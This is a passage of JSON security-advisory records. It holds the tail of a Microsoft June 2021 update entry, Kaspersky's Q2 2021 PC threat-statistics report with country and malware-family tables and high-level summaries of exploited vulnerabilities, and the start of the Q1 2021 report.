19043.1022](<https://download.microsoft.com/download/d/b/e/dbed46a6-e743-4aeb-b2a1-202c3dbe383e/SSU_version_19041.1022.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003637 (OS Builds 19041.1052, 19042.1052, and 19043.1052)\n", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003637", "href": "https://support.microsoft.com/en-us/help/5003637", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-08-12T10:37:29", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nLast quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from the eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, was reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide&#x27;s creators heaped the blame on third-party operators. Another post was published stating that DarkSide&#x27;s developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals&#x27; infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group&#x27;s activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. There appeared the new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family, which packs user files into a password-protected 7zip archive, plus our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: [CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.56% of users&#x27; computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its 